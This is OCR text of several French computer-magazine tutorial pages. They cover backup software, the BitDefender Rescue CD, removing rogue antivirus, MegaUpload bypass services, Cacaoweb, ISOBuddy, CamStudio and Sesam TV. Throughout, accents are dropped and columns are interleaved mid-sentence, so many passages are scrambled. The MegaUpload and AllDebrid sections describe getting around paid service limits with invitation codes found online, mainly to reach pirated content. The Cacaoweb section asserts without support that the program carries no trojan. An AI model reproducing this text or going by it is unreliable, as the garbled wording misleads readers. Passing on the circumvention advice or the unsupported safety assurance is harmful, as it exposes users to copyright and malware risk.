lopportunit dutiliser un outil maison ltraBackup permet les sauvegardes en vous basant sur
qui se nomme NTBackup. Mme sil est simplement de raliser des le contenu ou la date. Un module de
moins puissant quUltraBackup, il pourra sauvegardes sur un autre planification est galement de la partie
vous retirer une pine du pied si vous disque dur ou nimporte quel pour sauvegarder heures/dates
ntes pas sur votre machine. Vous pou- autre support (cl USB, rseau, email, rgulires ou au dbut/fin de session.
vez le lancer en cliquant sur Dmarrer, etc.) Il est possible de copier des fichiers Dautres fonctions trs intressantes
Excuter puis en tapant ntbackup. dun rpertoire vers une destination comme la restauration, limportation
dtermine, de compresser le tout ou et le journal dvnements en font le
ventuellement de crypter le contenu partenaire idal des utilisateurs qui
de votre sauvegarde avec une cl tiennent leurs donnes. En un clic,
Le choix du support unique. Vous pouvez choisir deffacer vous rcuprez la dernire version de
Pour stocker votre sauvegarde, nous vous le rpertoire source ou de synchroniser vos documents sauvegards !
dconseillons, bien sr, un rpertoire sur
votre disque principal. Optez plutt pour
un disque supplmentaire, un disque
externe ou, au pire, une autre partition.
Si vous manquez de place, vous avez
toujours lopportunit de stocker pro-
visoirement votre sauvegarde sur votre
disque C pour ensuite la graver sur CD
ou DVD. La cl USB est aussi une bonne
alternative

28
 ANONYMAT
PRATIQUE Faites votre
premire sauvegarde
avec UltraBackup
1 Configuration
Aprs linstallation du logiciel, lassistant vous
demande dentrer une cl de chiffrement pour le
cryptage des donnes. Il est possible de sauter
cette tape (en rentrant nimporte quoi) mais
au cas o vous voudriez crypter vos sauvegardes,
noubliez pas de choisir un mot de passe solide.
Choisissez ensuite le mode Application qui permet
de ne pas avoir UltraBackup en tche de fond.
Patientez quelques instants, le temps que le logi-
ciel configure le systme.
2 Le gestionnaire
Cliquez ensuite sur Lancer le gestionnaire de
sauvegarde puis sur le bouton Nouvelle Sauve-
garde (en haut gauche). Cliquez sur le bouton
Ajouter un lment pour choisir ce que vous
souhaitez sauvegarder. Une nouvelle fentre va
alors safficher. Cochez les lments qui vous int-
ressent puis cliquez sur Suivant. Le logiciel vous
demandera de choisir entre deux modes : le Diff-
rentiel (clich) et lIncrmental.
3 Diffrentiel ?
La sauvegarde diffrentielle va vous permettre de
sauvegarder les fichiers ayant t crs ou modi-
fis depuis la dernire sauvegarde complte. Pour
HACKING PROTECTION
BACKUP
restaurer tous vos documents, vous aurez ainsi
besoin de lancienne sauvegarde et de celles
effectues aprs. Le mode Incrmental permet
de sauvegarder les fichiers ayant t crs ou
modifis depuis une sauvegarde incomplte. Elle
permet en outre de Paramtrer la suppression
pour spcifier le dlai (en nombre de versions ou
de jours) pass lequel les versions obsoltes de
vos fichiers seront supprimes.
4 Cryptage et filtres
Aprs avoir valid, vous allez pouvoir dcider de
compresser et/ou crypter vos donnes. Ici, vous
pourrez aussi installer des filtres pour inclure ou
exclure uniquement les fichiers que vous aurez
choisis. Il est possible, par exemple, de ne sauve-
garder que les fichiers DOC dun rpertoire ou
au contraire dexclure les PDF. Utilisez pour cela
le bouton Ajouter. Pour ne pas utiliser de filtre,
choisissez Copier tous les fichiers. Aprs avoir
paramtr les filtres, cliquez sur Suivant. Ultra-
29
MULTIMDIA MICRO FICHES
Backup vous demande maintenant le rpertoire
dans lequel sera place la sauvegarde. Choisissez
lemplacement, le nom et aprs avoir valid, vous
pourrez planifier votre sauvegarde.
5 Sauvegardez !
Quel que soit votre choix, il sera possible de faire
votre premire sauvegarde aprs en avoir termin
avec lassistant. Nommez cette tche telle quelle
apparatra dans UltraBackup, puis cochez la case
Gnrer des rapports de sauvegarde pour cette
sauvegarde pour avoir un compte rendu des
erreurs. Vous aurez ensuite un rcapitulatif de vos
choix et vous pourrez commencer votre premire
sauvegarde. Aprs que le message vous indique le
succs et les ventuelles erreurs de votre backup,
vous pourrez accder aux options du logiciel sur sa
page principale. En cliquant sur le bouton Sauve-
gardes (la petite flche), vous pourrez outrepasser
les planifications, extraire une archive ou importer
une sauvegarde dun autre disque.
CE QU'IL VOUS FAUT
> UltraBackup 2007
http://telechargement.zebulon.fr/
ultrabackup.html
DIFFICULT
Vous navez rien vu venir.
Votre PC qui ronronnait, hier
encore, a t contamin par
BitDefender
Rescue CD :
un mchant virus. Pire que
cela, Windows refuse prsent
de dmarrer, il vous est donc
impossible de lancer un scan
ou de tenter de dsinfecter
votre machine. Seul le
quand rien ne va plus
BitDefender Rescue CD peut
encore sauver ce qui peut
ltre

Sur cl USB aussi

Si graver limage de BitDefender Rescue
CD ne vous satisfait pas, il est toujours
possible de crer une cl USB bootable
laide de lapplication UNetbootin ou un
autre logiciel de ce type. Ainsi, mme un
PC avec un lecteur de CD/DVD cass ou
votre rcent netbook pourra tre dsinfec-
t. Il faudra, bien sr, paramtrer le BIOS
pour quil boot sur cette cl USB
Lien : http://unetbootin.
sourceforge.net

Le BIOS
Le BIOS (Basic Input Output System) est
un petit programme qui gre toutes les
composantes de votre PC avant de passer

le relais Windows. Il est graphiquement
trs austre et ne se commande quau
clavier (pas de souris donc). Passez les
chapitres en revue avec les flches du cla-
vier et validez avec Entre. Pour sortir dun
menu, utilisez la touche Echap. Comme
il y a autant de BIOS que de marque de
carte mre (ou presque), les noms des
menus peuvent varier
Comment a marche ?
BitDefender va se lancer non pas par lin-
termdiaire de votre Windows vrol mais
en utilisant une version spciale de Linux
inclus dans le CD. Pas besoin dinstaller
quoique ce soit puisque tout est charg
dans la RAM de votre PC. Quand on voit
comment une version light de Linux peut
sauver votre Windows, on se demande
encore comment on peut garder cette
usine gaz malfique
L
orsquon est contamin par quarantaine. Le problme, cest que
un virus, on peut essayer lattaque peut tre si grave (base de
de sauver la situation en registre ou fichiers systme atteints)
scannant le systme la que votre systme dexploitation peut
recherche dlments corrompus parfois refuser de se lancer. La plupart
pouvant tre supprims ou mis en du temps, il faudra faire deuil de ses
fichiers (ae, la dernire
saison de Weeds),
formater le disque dur (Are
you sure ? Y/N) et rinstaller
Windows ainsi que tous vos
logiciels. Heureusement,
il existe une solution. Un
recours de la dernire
chance : BitDefender
Rescue CD.
Jadore quun plan se
droule sans accroc

30
 ANONYMAT
PRATIQUE Rparez votre PC avec
BitDefender
Rescue CD
1 Tlchargez
Vous ne trouverez pas le Rescue CD sur
le site franais de BitDefender, il va falloir
aller le chercher au lien que nous vous
indiquons dans lencadr Ce quil vous
faut. Cliquez sur Bitdefender-rescue-cd.
iso et tlchargez-le lendroit que vous
souhaitez.
2 Gravez
Pour graver facilement votre fichier image
(ISO), nous vous invitons utiliser le logi-
ciel gratuit CDBurnerXP. Lors du dmarrage,
cliquez sur Graver une image ISO, validez
puis retrouvez lemplacement de votre
fichier en cliquant sur les trois petits point
droite du champ libre.
La dernire chance, au
dernier moment
Cre par les Roumains de SoftWin, il
sagit dun Live CD Linux bootable.
En gros, depuis le PC dun ami,
vous tlchargez limage au format
ISO pour ensuite le graver sur un
CD. Il suffira de faire un tour dans
votre BIOS (car mme si Windows
refuse dentendre quoique ce soit,
HACKING PROTECTION
LE CD QUI GURIT !
3 Le BIOS
Une fois que votre galette est prte, il va
falloir demander votre PC endommag
quil la lise au dmarrage. Pour cela, il
faudra passer par le BIOS. Dmarrez
votre PC et appuyez rptitivement sur
Suppr (ou parfois F1). Le menu Setup
devrait alors safficher. Cherchez dans
cette page quelque chose qui ressemble
Boot Menu ou Boot Sequence (parfois,
lordre de boot est aussi accessible via
F12). Ici, il faudra mettre le lecteur de
CD/DVD en numro 1. Les priphriques
qui suivent sont moins importants Ne
vous inquitez pas, tant que vous ne
sauvegardez pas, rien de ce que vous
toucherez ne sera dfinitif. Si vous pensez
avoir commis une bourde, choisissez Quit
without saving (ou quelque chose du
genre). Au contraire, si vous avez russi
(bravo !), sauvegardez et placez votre CD
dans le lecteur avant de redmarrer.
le BIOS est lui toujours disponible)
pour dmarrer partir de ce
CD. Les outils quil contient vont
alors rechercher et liminer les
virus paralysant votre machine.
La base de ce Live CD est issue
de BitDefender 2009 mais il est
possible de tlcharger les mises
jour de dfinitions pour parer
aux attaques les plus rcentes.
31
MULTIMDIA MICRO FICHES
4 Lancez
Une fois lanc, vous dcouvrirez une
interface claire avec trois boutons :
Scanner, Update, Settings. Commen-
cez par mettre jour les signatures de
virus. Slectionnez ensuite vos dossiers,
disques ou tout le systme avant de
lancer lanalyse. Il vous sera possible
de choisir de supprimer ou mettre en
quarantaine les donnes vroles. Lors-
que vous aurez rpar votre PC, noubliez
pas de refaire un tour dans le BIOS pour
remettre votre disque dur en numro 1
dans la squence de boot
CE QU'IL VOUS FAUT
> BitDefender Rescue CD
http://download.bitdefender.com/
rescue_cd
> CD Burner XP
http://cdburnerxp.se
DIFFICULT
Plus fort, ce Live CD comprend des
outils de restauration de fichiers
et de sauvegarde de partitions. On
aurait presque envie de se faire
vrol pour tester la bte la
rdaction, nous avons juste laiss
notre poissard de Directeur de
Publication toucher un PC pendant
15 minutes pour rendre ce dernier
inutilisable. Imparable.
Les rogues :
ces faux antivirus
Liste de rogues
Vous pouvez attraper un rogue de
plusieurs manires : tlchargement
dun faux codec ou faux crack, visite
dun site pas trs catholique, etc.
Pour viter ces malwares, rien ne
vaut un bon antivirus et un firewall
bien configur mais parfois, certains
passent au travers des filets. Ne
faites donc jamais confiance un
antivirus que vous navez pas install.
Si vous ntes pas le seul utiliser
votre ordinateur, vous trouverez sur le
lien suivant une liste mise jour de
rogues par ordre alphabtique...
www.donnemoilinfo.com/sujet/
Malware/les-rogues.php
Peut-tre avez-vous dj
vu ces avertissements
sur Internet qui vous
prvienne dune attaque de
virus. Bizarrement, ils ne
proviennent pas de votre
antivirus mais linterface
srieuse a de quoi vous
mettre le doute. Ne tombez
pas dans le pige, il sagit
dun rogue (ou scareware).
Un logiciel qui joue sur la
peur de la contamination
pour vous soutirer de
largent...

Vou te contaminez !
Pour arnaquer encore plus de gens,
les mmes rogues sont parfois
traduits dans plusieurs langues.
Lavantage pour vous cest que les
contrevenants ne sont pas trs forts
en franais et utilisent des outils de
traduction automatique. Si vous voyez
des fautes dorthographes ou une
phrase qui ne veut rien dire lors dun
avertissement, cest un pige !
L
es rogues sont de faux
antivirus crs par des
petits filous pour faire de
largent sur la crdulit
des internautes. Tout commence
par une infection bnigne, le rogue
sinstalle sur votre ordinateur mais
ne dtruit rien du tout, il est donc
assez difficile pour un antivirus de
dtecter quoique ce soit. Au bout
de quelques minutes, vous verrez
une fentre, un pop-up ou un
avertissement Windows qui vous
indique quune menace est dtecte
sur votre ordinateur. Bien sr cette
menace est imaginaire et pour

Toujours l toi ?
Si malgr laction de Malwarebyte
Anti-Malware vous avez encore des
avertissements qui saffichent, cest
que le rogue qui svit sur votre PC
ncessite une dsinfection spcifique On croirait
(comme le trs pnible Security Tool). vraiment un
Il faudra parfois lancer votre ordina-
antivirus non ? Et
teur en mode sans chec puis tenter
une dsinfection la main. Dans ce bien non, Security
cas de figure, il faudra rechercher un Tool est un
protocole de dsinfection sur Google rogue... Et un des
en tapant le nom du rogue qui vous plus pnible
mne la vie dure...
radiquer !

32
 ANONYMAT HACKING
PRATIQUE liminez les rogues avec
Malwarebytes Anti-Malware
1 Linstallation
Ce logiciel est gratuit mais malheureu-
sement la protection rsidente nest
disponible que dans la version payante
(20 ). Qu cela ne tienne, vous pourrez
vous dbarrasser des rogues ou autres
malwares en faisant un scan ds que
vous aurez des signes de contamination.
Allez sur le site Web et cliquez sur Down-
load Free Version puis sur Download
Location. Installez le soft et cochez les
cases de mise jour et de lancement
automatique.
2 La recherche
Dans longlet principal Recherche, vous
aurez le choix entre un examen rapide
et un examen complet (la troisime
option nest disponible que dans la
version payante). Si vous tes sr
dtre contamin par un rogue, optez
pour le complet, faites Recherchez
et choisissez les disques durs que
vous voulez scanner. Selon la quantit
supprimer ces infections, vous
devez passer la caisse ! Si vous ne
cdez pas, le rogue va alors tout
mettre en uvre pour vous faire
craquer : affichage de plusieurs
fentres, modification du fond
dcran (pour faire croire quelque
chose de srieux), icnes dalerte
dans le systray (les petites icnes
en bas droite prs de lhorloge),
etc. Les brigands regorgent
PROTECTION
ARNAQUE
de donnes que vous avez sur votre
ordinateur, le scan peut savrer trs
long. Comptez 2 heures pour 200 Go.
3 Les rsultats
la fin du scan, cliquez sur Afficher
les rsultats si le logiciel a dcouvert
quelque chose puis sur Supprimer la
slection pour corriger les problmes.
Un journal devrait souvrir avec le dtail
des actions effectues. La plupart du
temps, le programme effacera les traces
des malwares mais il arrive cependant
quil ne puisse les mettre quen quaran-
taine (voir longlet idoine).
dingniosit pour vous faire
croire que Windows vous prvient
vraiment dune contamination
(ils vont jusqu copier linterface,
la police, les couleurs). Mme le
nom de ces rogue font vraiment
penser des antivirus classiques
(InternetShield, Antivirus Protector,
etc.) Il y a vraiment de quoi se
laisser berner... Lorsque vous
cliquez enfin sur le fameux bouton
33
MULTIMDIA MICRO FICHES
4 Les onglets
Si un fichier ne peut tre effac, soit
parce quil est verrouill ou utilis en
ce moment par le systme, il faudra
utiliser le module File Assassin (dans
longlet Autres outils). En ce qui
concerne les autres onglets, pas de
surprise majeure. Allez dans Mise
jour pour updater votre logiciel avant
chaque utilisation, et faites un tour
dans Exclusion en cas de faux ngatif
pour ne pas rexaminer un fichier
inoffensif qui aurait t dtect comme
une menace.
CE QU'IL VOUS FAUT
> Malwarebytes
Anti-Malware (Gratuit)
www.malwarebytes.org
DIFFICULT
Scan du rogue, vous verrez une
interface imitant la perfection
celle dun antivirus qui scan un
systme avec barre de progression,
des noms de fichiers qui dfilent,
etc. Bien sr tout est faux. Au
final, le rogue va vous dtecter
quelques virus trs dangereux et
vous proposer de les radiquer
pour des sommes allant de 10
plus de 80 .

MegaUpload et ses PetaOctets
de donnes sont contraints,
pour diverses raisons, de
brider les connexions vers
leurs serveurs. De nombreux
sites proposent un dbridage,
avec plus ou moins de succs.
Attention aux arnaques, suivez
le guide !
Dbrideur ou
gestionnaire de
tlchargement ?
Ne pas confondre les dbrideurs qui
sont la plupart du temps des services
en ligne avec les gestionnaires de
tlchargement tels que Jdownloader.
Ceux-ci permettent de faciliter et
dautomatiser le tlchargement, mais
ils ne fournissent pas les avantages
dun compte Premium. Au mieux, ils
taperont le Captcha votre place.
Qui peut vraiment
dbrider
MegaUpload ?
L
aissez parler votre bande-passante. En France,
MegaUpload est le service dhbergement de fichiers
en un clic le plus populaire. Des millions dutilisateurs
y stockent plusieurs PetaOctets de donnes. Victime
de son succs et surtout la recherche de financements,
MegaUpload a dcid de montiser son service et de le brider
pour les utilisateurs basiques. Les raisons sont simples, dabord,
il sagit dconomiser la bande passante et dans un deuxime
temps, il faut rentabiliser le service. Ce que MegaUpload navait
peut-tre pas prvu, cest que des internautes malveillants
chercheraient contourner ces limitations, pour profiter du
service sans aucune restriction de temps ou de puissance.
Plus rapide et plus fourni que RapidShare, MegaUpload
est devenu, en seulement 5 ans, un site de stockage
en ligne indispensable. Les drives sont nombreuses
et la plupart des utilisateurs profitent du laxisme
de MegaUpload pour y placer des fichiers protgs
par le droit dauteur. Cette politique a permis au site
de connatre un trafic ahurissant, le plaant au 72me
rang (Alexa) des sites les plus visits. Mais la notorit ne
saccompagne pas que de bonnes choses. Trs vite, les utilisateurs
PRATIQUE Invitez vous
1 Se taper lincruste
AllDebrid est un service litiste,
linstar de certains trackers privs, vous
serez obligs dobtenir une invitation
pour pouvoir avoir le droit de vous
inscrire. Ces invitations se prsentent
sous forme de codes, et vous devrez
connatre un utilisateur pour en obtenir
un. Heureusement, une rapide recherche
avec votre ami Google, vous permettra
de court-circuiter cette tape. Le site
http://codesalldebrid.blogspot.com/,
par exemple, propose une liste de codes,
copiez-en un au hasard, vous aurez peut-
tre la chance quil nait pas dj servi.
34
 ANONYMAT
blass de devoir payer pour accder
aux contenus stocks sur les serveurs
de MegaUpload, ont cherch
contourner les dispositifs mis en place.
Cest dans ce contexte que sont ns les
dbrideurs.
Ces sites permettent daccder aux
services Premium de MegaUpload
sans pour autant avoir crer de
compte. Pour raliser cette prouesse,
les dbrideurs utilisent des proxy
et connectent les internautes des
serveurs distants sur lesquels sont
configurs des comptes Premium.
Une fois que lutilisateur de ces
dbrideurs a accd aux contenus
protgs, il peut les rapatrier sans
aucune difficult, tout en profitant au
maximum de sa bande-passante. Le
gain de temps et dargent nest alors
pas ngligeable.
Les dbrideurs,
rois de larnaque
Mais, car bien entendu il y a un
mais , si en thorie les dbrideurs
sont des services gratuits et
incroyablement utiles, il nen reste
pas moins que la plupart sont
des arnaques. On les compte par
milliers (loccurrence dbrideurs
MegaUpload sur Google renvoie
environ 70 000 rsultats). Certains vous
sur AllDebrid
2 Crer un compte
Lorsque vous crez un compte vous avez
droit une priode
dessai gratuite de deux
jours pour un compte
Premium. Entrez donc
le code sur la page
daccueil et remplissez
les champs, afin de fi-
naliser votre inscription.
Prcisez une adresse
mail relle, car vous de-
vrez valider en cliquant
sur un lien qui vous sera
envoy par mail.
HACKING PROTECTION MULTIMDIA MICRO FICHES
MEGAUPLOAD
proposent la lune, mais ne sont en
Deux dbrideurs qui
fait que des nids malwares, dautres
fonctionnent !
vous paraissent honntes, mais ne
fonctionnent pas. La dure de vie Le premier se nomme trs humblement
MegaVideoNoTimeLimit. Il ne sagit pas
dun site de dbridage est dailleurs
dun dbrideur de bande-passante, mais
relativement courte, quelques mois il permet de commencer un tlcharge-
tout au plus. MegaUpload ne reste en ment sans avoir attendre les fameuses
effet pas les bras croiss et supprime 45 secondes.
ou bloque les comptes Premium
suspicieux, placs sur les serveurs
distants. Il suffit de se rendre sur le
site annuaire de dbrideurs, www.
debrideurs-infos.com, pour se rendre
compte que la plupart des services
prsents ne fonctionnent plus ou
sont devenus payants.
Le second est beaucoup plus abouti et
nous vous le prsentons plus en dtail
Il est, effectivement, trs peu probable dans le pas--pas suivant, il sagit de
de tomber sur des dbrideurs AllDebrid. Si ce site est payant, il nous
gratuits. Comment rentabiliser un tel a paru tre le plus stable et surtout tre
service sans modle conomique ? celui qui fonctionne le mieux. Linvestisse-
La publicit elle seule ne peut pas ment revient environ 10 centimes par
subventionner la location des serveurs jour pour un an.
ncessaires. Bien souvent, les sites
font appel aux dons, mais l encore,
le service ferme avant mme davoir CE QU'IL VOUS FAUT
reu les premiers deniers. Et puis, il est
difficile de demander aux utilisateurs > AllDebrid (payant)
de payer. a devient mme incohrent. www.alldebrid.fr
Payer pour avoir le droit dutiliser un > Jdownloader (gratuit)
service gratuitement, qui lui-mme http://jdownloader.org/
vous permet davoir gratuitement des
contenus pirats. a revient financer DIFFICULT
le pirate qui a pirat le pirate.
3 Dbrider des liens
Maintenant que vous tes
connects, vous pouvez bn-
ficier de tous les services
de AllDebrid gratuitement
pendant deux jours. Dans la
colonne de droite, le panneau
Dbrideurs vous montre les
services qui sont disponibles
pour votre compte. Une cinquantaine de services de stockage en ligne sont dbridables.
Dans le panneau Espace membres, cliquez sur Accs aux dbrideurs. Entrez ensuite
vos liens dans le panneau central en les sparant par un retour la ligne. Cliquez sur
Valider et cest gagn. Vous pouvez prsent rcuprer les liens qui vous sont donns et
les coller dans Jdownloader. Vous pourrez alors tlcharger sans aucune limite de temps
et mme plusieurs fichiers simultanment.
35
 ANONYMAT
CACAOWEB
dbride Megavido !
Grce Cacaoweb, il est possible
de regarder des vidos depuis la
plateforme MegaVido sans tre
restreint par la limite de 72 minutes.
Lapplication est compatible avec de
nombreux navigateurs et sintgre en
quelques clics.
savoir !
Cacaoweb sexcute depuis le disque
sur lequel il est install. Si vous souhai-
tez, vous pouvez le transporter sur cl
USB. Tous vos paramtres de connexion
seront ainsi enregistrs sur ce support
et vous pourrez lutiliser nimporte o.
CE QU'IL VOUS FAUT
> Cacaoweb (gratuit)
www.cacaoweb.org
DIFFICULT
PRATIQUE Utiliser Cacaoweb
1 Installer Cacaoweb
Il est fortement recommand de tlcharger
lapplication depuis le site officiel (www.
cacaoweb.org/downloads.html). Le
programme pse moins de 300 Ko. Une
fois tlcharg, un double-clic suffit pour
le lancer. En thorie, votre navigateur web
par dfaut devrait souvrir sur la page
Cacaoweb. Si ce nest pas le cas, ouvrez
le manuellement et tapez ladresse
suivante dans la barre de navigation :
http ://127.0.0.1:4001/index.html.
HACKING PROTECTION MULTIMDIA
C
acaoweb est le fils spirituel
dIllimitux. Pour ceux qui ne
connaissent pas, il sagissait
du plugin Firefox permettant
de zapper la limitation de MegaVido,
afin de regarder les vacances de
grand-mre dun seul trait.
Effectivement, le site de streaming
MegaVideo, connu pour ne pas tre
trop regardant sur les contenus stocks,
limite le visionnage 72 minutes
conscutives. Au-del de cette limite, il
faut attendre 54 minutes pour pouvoir
accder la suite.
Le successeur officiel se nomme donc
Cacaoweb. Un nom un
peu trange et beaucoup
moins explicite que celui
de son prdcesseur. Le
fonctionnement est en
revanche simplifi.
Quelques clics suffisent pour arriver
voir la vido. Linterface choisie est une
interface web, intuitive et minimaliste
(voir notre pas--pas).
2 Regarder une vido
Lcran principal, plutt minimaliste, vous
indique si lapplication est en route (Ca-
caoweb is on). Si ce nest pas le cas,
relancez lapplication. Entrez ladresse de
votre vido, qui doit avoir la forme www.
megavideo.com/?=XXXXXXXX, dans le
champ Lien MegaVido et validez. En cli-
quant sur le lien Administration en haut
droite, vous aurez accs dautres options.
Vous verrez toutes les vidos dj vision-
nes et vous pourrez teindre lapplication
(turn off) ou la dsinstaller (uninstall).
36
MICRO FICHES
MEGAVIDEO
Du P2P invisible
Les concepteurs de Cacaoweb ont pris
le parti de construire lapplication sur
un rseau P2P. Que les allergiques des
rseaux Torrent se rassurent, tout ceci
se passe de manire totalement
transparente pour lutilisateur.
Lavantage de cette technique, cest que
ce nest pas un serveur qui supporte
lenvoi et le stockage des vidos, mais
Malgr ce qui est colport par
certaines rumeurs, Cacaoweb ne contient
aucun trojan et peut sinstaller les yeux
ferms.
bien lensemble des utilisateurs de
Cacaoweb. Cette rpartition permet de
diminuer de manire drastique les
cots impliqus par lopration et
surtout, cela garantit aux utilisateurs
une certaine souplesse dusage.
Avec ou sans trojan ?
La principale critique formule envers
Cacaoweb rside dans le fait que
certains logiciels anti-virus lont dtect
comme trojan. Aprs vrification, il
sagit bien de faux positifs et lquipe
de dveloppement travaille dailleurs
activement au rglage de ce problme.
Cacaoweb est lheure actuelle la
meilleure solution pour profiter des
vidos longue dure de MegaVido
sans compte Premium. Le fait davoir
dvelopp une solution aussi triviale
utiliser devrait sduire de nombreux
internautes.
 ANONYMAT HACKING PROTECTION MULTIMDIA MICRO FICHES
FICHIER IMAGE

ISOBuddy,
LAMI DES
IMAGES
Image ?
Cest avec lapparition des lecteurs de
CD-Rom que les fichiers image ont vu Sauvegarde, copie ou tlchargement sur Internet, vous croiserez sans aucun doute
le jour. Vous pouvez les crer ou les un fichier image un jour. ISOBuddy permet de convertir les images des formats
trouver sur Internet. Ce sont des copies
conformes de ce que lon trouve sur le propritaires vers un format ISO 9660 normalis. Un outil qui peut se rvler trs
disque dorigine mais Windows ne peut pratique.

I
pas y avoir accs. Ils sont comme des
botes o lon peut mettre diffrentes SOBuddy vous sauvera la mise. image que de logiciels (NRG pour
choses lintrieur : musique, Ltendue de son champ Nero, CDI pour DiscJuggler, etc.), il est
animation vido, etc. On est sr du dapplication est trs vaste. Au souvent difficile douvrir ou de copier
contenu mais on ne peut pas y avoir travail dabord, de nombreuses de tels fichiers. Sur Internet vous
accs. Une fois grave sur un CD/DVD, socits utilisent les fichiers images trouverez aussi des fichiers images
la bote souvre et on peut profiter du pour sauvegarder ou copier des prt tre gravs mais les logiciels de
contenu ! La norme internationale ISO contenus professionnels, seulement gravure gratuit ne prennent le plus
9660 permet une interoprabilit entre voil, dune entreprise lautre, les souvent en compte que le format ISO
les diffrents systmes et logiciels. logiciels utiliss divergent. Comme il 9660. En partant de ce constat, et pour
existe environ autant de formats lutter contre les formats propritaires,
le concepteur dISOBuddy a dcid de
crer un outil capable de transformer
Dcouvrez ISOBuddy nimporte quel fichier image en fichier
ISO. Vous pouvez aussi trouver une
Le bouton Open vous application la maison. Si vous avez
servira charger le copi le contenu de lun de vos DVD
fichier image que vous
souhaitez convertir. (non protg, cela va de soi) avec un
logiciel et que vous navez plus accs
ce logiciel (suppression, remplace-
ment ou expiration de la licence), vous
Le bouton Start, comme ne pourrez plus utiliser votre fichier
son nom lindique,
lancera la conversion.
image, ni le graver. ISOBuddy viendra
Celle-ci peut prendre votre rescousse pour le transformer
plusieurs minutes selon en fichier normalis que vous pourrez
la taille du fichier
dorigine. alors graver avec nimporte quel
logiciel de gravure gratuit
(CDBurnerXP par exemple).
Le format de sortie sera
le format ISO9660, plus
conventionnel et rpandu CE QU'IL VOUS FAUT
que ses cousins
propritaires. > ISOBuddy (gratuit)
Le champ Source file indique le chemin, Il est galement possible
le nom et lextension du fichier source. Ici, de graver limage de sortie www.dvd-ranger.com
*.gi (Global Image) indique que le fichier dans la foule grce
image a t gnr avec le logiciel Roxio. loption Burn.
DIFFICULT

37
 ANONYMAT
CamStudio :
enregistrez la vole !
CamStudio permet denregistrer
en vido ce qui se passe sur votre
PC. Cest le programme idal pour
capturer le stream, enregistrer une
communication en visio ou raliser un
tutoriel vido
CamStudio en lossless
Pour profiter du codec lossless de CamS-
tudio, rendez-vous sur la page du logiciel
et tlchargez-le au format EXE. Aprs
avoir install CamStudio, faites de mme
pour ce codec. Aprs un petit redmar-
rage, il figurera dans la liste de codec
Options > Video Options > Compressor >
CamStudio Lossless Codec v1.4.
CE QU'IL VOUS FAUT
> CamStudio (gratuit)
http://camstudio.org
DIFFICULT
PRATIQUE Premiers pas avec CamStudio
1 Le choix du codec
Avant de commencer il va falloir rgler CamStudio
en fonction de votre utilisation. Faites un tour dans
Options > Video Options pour choisir le codec (voir
notre encadr), la qualit et le nombre dimages par
seconde. Dans Options > Cursor Options, vous pour-
rez choisir dafficher le pointeur de la souris ou non
dans votre enregistrement.
HACKING PROTECTION MULTIMDIA MICRO FICHES
VIDO
C
amStudio enregistre au puisquavec le logiciel inclus SWF
format vido AVI tout ce qui Producer, vous pouvez convertir votre
se passe lcran. Lutilisateur fichier ce format. Attention, plus la
a mme le choix denregistrer rsolution est importante et moins
la totalit de votre bureau ou unique- lanimation sera bonne. Mme avec
ment lactivit dune zone que vous une bte de course, nesprez pas
aurez prdfinie. Cerise sur le gteau, le enregistrer vos parties de Modern
logiciel enregistre aussi le son qui sort Warfare 2 !
de vos enceintes, de votre casque ou
de votre micro.
3 utilisations !
Vous pouvez donc tranquillement faire
un tutoriel anim avec des commen-
taires, enregistrer une conversation
Skype ou MSN et capturer les flux
stream de YouTube, MegaVideo, etc. Le
logiciel va directement piocher dans les
codecs qui figurent dans votre ordina-
teur mais lditeur propose aussi une
compression lossless ne dtriorant
pas la qualit tout en rduisant la taille
de votre fichier final. Enfin, si vous
aimez le Flash, vous allez tre servi
2 La source audio bonne fois pour toutes une fentre et Full Screen
enregistrera tout lcran.
Toujours dans Options, Vous
pouvez choisir de ne pas
enregistrer le son (Do not
4 REC !
record audio), enregistrer le Il ne reste qu cliquez sur le bouton rouge denregis-
son qui sort de votre micro trement pour commencer la capture. la fin, cliquez
(si vous voulez ajouter des sur stop et le logiciel vous demandera o vous voulez
commentaires) ou de vos sauvegarder votre fichier final. Si vous dsirez conver-
enceintes (pour lenregis- tir votre AVI au format Flash (pour un site, etc.), faites
trement dune mission ou un tour dans Tools > SWF Producer.
dune conversation). Pour affiner les rglages
audio, faites un tour dans Options > Audio options.
3 La zone de capture
Aprs avoir paramtr les sources audio et vido, in-
tressons-nous la zone de capture. Allez Region
dans le menu. En choisissant Region, vous slection-
nerez avec votre souris la zone couvrir pour chaque
capture. Avec Fixed Region, vous dterminerez une
38
 ANONYMAT HACKING PROTECTION MULTIMDIA MICRO FICHES
MEDIA CENTER

Sesam
souvre au multimdia !

Dsormais gratuit, Sesam
TV Media Center est
une interface graphique
permettant de jongler avec
tous vos mdias. Musique,
tlvision, DVD, radio ou
photos, ce logiciel centralise
tout sur votre PC et dans
votre salon, si vous tes
quip de la connectique
adapte. Compatible avec
les tlcommandes PC et les
cartes TV, ce Media Center
soccupe vraiment de tout !
S
esam TV Media Center vient
sajouter la liste des interfaces
gratuites permettant de lire
des vidos, des fichiers audio,
regarder la tlvision ou afficher vos
photos en plein cran depuis votre
canap. Comme ses concurrents, Sesam
TV propose une belle interface bleute
fortement inspire du Media Center de
Windows Vista. Les principales sections
sont disponibles depuis la page daccueil :
tlvision, DVD, musique, vidos ou encore
photos. Il suffit de quelques minutes
pour paramtrer le logiciel. Aprs avoir
slectionn une section, il suffit de
spcifier lemplacement de vos fichiers
pour les voir sintgrer linterface
immdiatement. La navigation dans
les bibliothques se fait au moyen de
vignettes (aperus ou pochettes dalbums).
Notons enfin que Sesam TV est compatible
avec de nombreuses cartes DVB-T ou
DVB-S (tuner analogique, TNT et Satellite)
et avec la plupart des tlcommandes.
Media Portal, lalternative
Media Portal est une trs bonne alternative
Sesam TV. Un peu plus complexe prendre en
main, ce logiciel propose un certain nombre de
plugin additionnels permettant, par exemple,
dajouter une chane mto, de trouver
une sance cinma ou de programmer un
enregistrement distance via e-mail.
www.team-mediaportal.com

PRATIQUE Premiers pas avec Sesam TV

automatiquement les chanes disponibles.
1 Installation Vous devrez faire peu prs la mme manipu-
Pendant linstallation, Sesam TV va peut-tre
vous demander de tlcharger des compos-
ants additionnels permettant de bien afficher

Sesam TV toujours en premier plan (pour

ou douvrir vos fichiers. Laissez le programme
sinitialiser et attaquez directement par longlet
Configuration en haut (en forme de cl).
2 Configuration
Dans les paramtres daffichage, vous pour-
rez rgler la taille et la position de lcran.
Nous vous conseillons aussi de placer
viter que de vilaines fentres Windows vi-
ennent vous embter pendant le visionnage lation dans chaque catgorie : emplacement
du dernier concert de Johnny). Dans Modi- des playlists pour Musique, de vos clichs
